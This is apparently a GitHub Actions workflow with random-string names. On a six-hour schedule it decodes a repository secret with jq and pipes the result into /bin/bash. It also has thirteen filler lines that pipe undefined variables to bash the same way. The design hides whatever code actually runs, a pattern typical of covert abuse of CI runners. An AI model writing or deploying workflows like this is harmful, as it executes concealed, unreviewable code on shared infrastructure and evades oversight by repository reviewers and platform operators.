name: ruanxiaowu19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ruanxiaowu19871010
        env:
          mcphk84331: ${{ secrets.mcphk84331 }}
        run: |
          echo $mcphk84331 | jq -r .vmrul14433 | /bin/bash
          echo $ado5 | jq -r .d7 | /bin/bash
          echo $nnew3 | jq -r .vpd8269 | /bin/bash
          echo $nesvx54672 | jq -r .bmdo8113 | /bin/bash
          echo $p93 | jq -r .bk3500 | /bin/bash
          echo $xdh52 | jq -r .vbap09475 | /bin/bash
          echo $jqlco0 | jq -r .gdq50897 | /bin/bash
          echo $tr04612 | jq -r .jnbz19855 | /bin/bash
          echo $a9 | jq -r .l17 | /bin/bash
          echo $cbyt09873 | jq -r .zsa48 | /bin/bash
          echo $ub93253 | jq -r .tsu80527 | /bin/bash
          echo $n480 | jq -r .ojoc1239 | /bin/bash
          echo $ne54992 | jq -r .sapy11 | /bin/bash
          echo $gsstz89 | jq -r .cdd424 | /bin/bash

